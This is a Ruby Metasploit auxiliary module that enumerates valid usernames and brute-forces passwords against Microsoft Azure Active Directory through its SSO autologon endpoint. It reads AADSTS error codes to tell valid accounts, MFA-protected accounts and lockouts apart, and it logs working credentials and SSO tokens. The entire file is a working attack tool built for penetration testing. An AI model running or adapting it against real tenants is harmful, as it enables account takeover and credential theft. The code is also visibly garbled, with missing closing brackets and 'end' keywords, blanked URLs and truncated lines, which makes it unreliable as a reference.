# This module requires Metasploit:
# Current source:

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute

  def initialize
      'Name' => 'Microsoft Azure Active Directory Login Enumeration',
      'Description' => %q{
        This module enumerates valid usernames and passwords against a
        Microsoft Azure Active Directory domain by utilizing a flaw in
        how SSO authenticates.
      'Author' => [
        'Matthew Dunn - k0pak4'
      'License' => MSF_LICENSE,
      'References' => [
        [ 'URL', ''],
        [ 'URL', ''],
        [ 'URL', ''],
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true,
        'RHOST' => '',
        'PASSWORD' => 'password'

      ['RHOST', [true, 'The target Azure endpoint', '']),'DOMAIN', [true, 'The target Azure AD domain']),'TARGETURI', [ true, 'The base path to the Azure autologon endpoint', '/winauth/trust/2005/usernamemixed']),

    deregister_options('PASSWORD_SPRAY', 'VHOST', 'USER_AS_PASS',
                       'USERPASS_FILE', 'STOP_ON_SUCCESS', 'Proxies',
                       'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS',
                       'BLANK_PASSWORDS', 'RHOSTS')

  def report_login(address, domain, username, password)
    # report information, if needed
    service_data = service_details.merge({
      address: address,
      service_name: 'Azure AD',
      workspace_id: myworkspace_id
    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
      realm_value: domain,
      username: username,
      private_data: password,
      private_type: :password
    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL


  def check_login(targeturi, domain, username, password)
    request_id = SecureRandom.uuid
    url = "https://#{rhost}/#{domain}#{targeturi}"

    created =
    expires = ( + 600).inspect

    message_id = SecureRandom.uuid
    username_token = SecureRandom.uuid

    body = "<?xml version='1.0' encoding='UTF-8'?>
<s:Envelope xmlns:s='' xmlns:wsse='' xmlns:saml='urn:oasis:names:tc:SAML:1.0:assertion' xmlns:wsp='' xmlns:wsu='' xmlns:wsa='' xmlns:wssc='' xmlns:wst='' xmlns:ic=''>
        <wsa:Action s:mustUnderstand='1'></wsa:Action>
        <wsa:To s:mustUnderstand='1'>#{url}</wsa:To>
        <wsse:Security s:mustUnderstand=\"1\">
            <wsu:Timestamp wsu:Id=\"_0\">
            <wsse:UsernameToken wsu:Id=\"#{username_token}\">
                <wsse:Username>#{username.strip.encode(xml: :text)}@#{domain}</wsse:Username>
                <wsse:Password>#{password.strip.encode(xml: :text)}</wsse:Password>
        <wst:RequestSecurityToken Id='RST0'>

    res = send_request_raw({
      'uri' => "/#{domain}#{targeturi}",
      'method' => 'POST',
      'vars_get' => {
        'client-request-id' => request_id
      'data' => body

    unless res
      fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")

    @target_host ||= report_host(host: rhost, name: rhost, state: Msf::HostState::Alive)

    # Check the XML response for either the SSO Token or the error code
    xml = res.get_xml_document

    if xml.xpath('//DesktopSsoToken')[0]
      auth_details = xml.xpath('//DesktopSsoToken')[0].text
      auth_details = xml.xpath('//internalerror/text')[0].text

    if xml.xpath('//DesktopSsoToken')[0]
      print_good("Login #{domain}\\#{username}:#{password} is valid!")
      print_good("Desktop SSO Token: #{auth_details}")
      report_login(@target_host.address, domain, username, password)
    elsif auth_details.start_with?('AADSTS50126') # Valid user but incorrect password
      print_good("Password #{password} is invalid but #{domain}\\#{username} is valid!")
      report_login(@target_host.address, domain, username, nil)
    elsif auth_details.start_with?('AADSTS50056') # User exists without a password in Azure AD
      print_good("#{domain}\\#{username} is valid but the user does not have a password in Azure AD!")
      report_login(@target_host.address, domain, username, nil)
    elsif auth_details.start_with?('AADSTS50076') # User exists, but you need MFA to connect to this resource
      print_good("Login #{domain}\\#{username}:#{password} is valid, but you need MFA to connect to this resource")
      report_login(@target_host.address, domain, username, password)
    elsif auth_details.start_with?('AADSTS50014') # User exists, but the maximum Pass-through Authentication time was exceeded
      print_good("#{domain}\\#{username} is valid but the maximum pass-through authentication time was exceeded")
      report_login(@target_host.address, domain, username, nil)
    elsif auth_details.start_with?('AADSTS50034') # User does not exist
      print_error("#{domain}\\#{username} is not a valid user")
    elsif auth_details.start_with?('AADSTS50053') # Account is locked
      print_error('Account is locked, consider taking time before continuuing to scan!')
    else # Unknown error code
      print_error("Received unknown response with error code: #{auth_details}")

  def run
    each_user_pass do |cur_user, cur_pass|
      check_login(datastore['TARGETURI'], datastore['DOMAIN'], cur_user, cur_pass)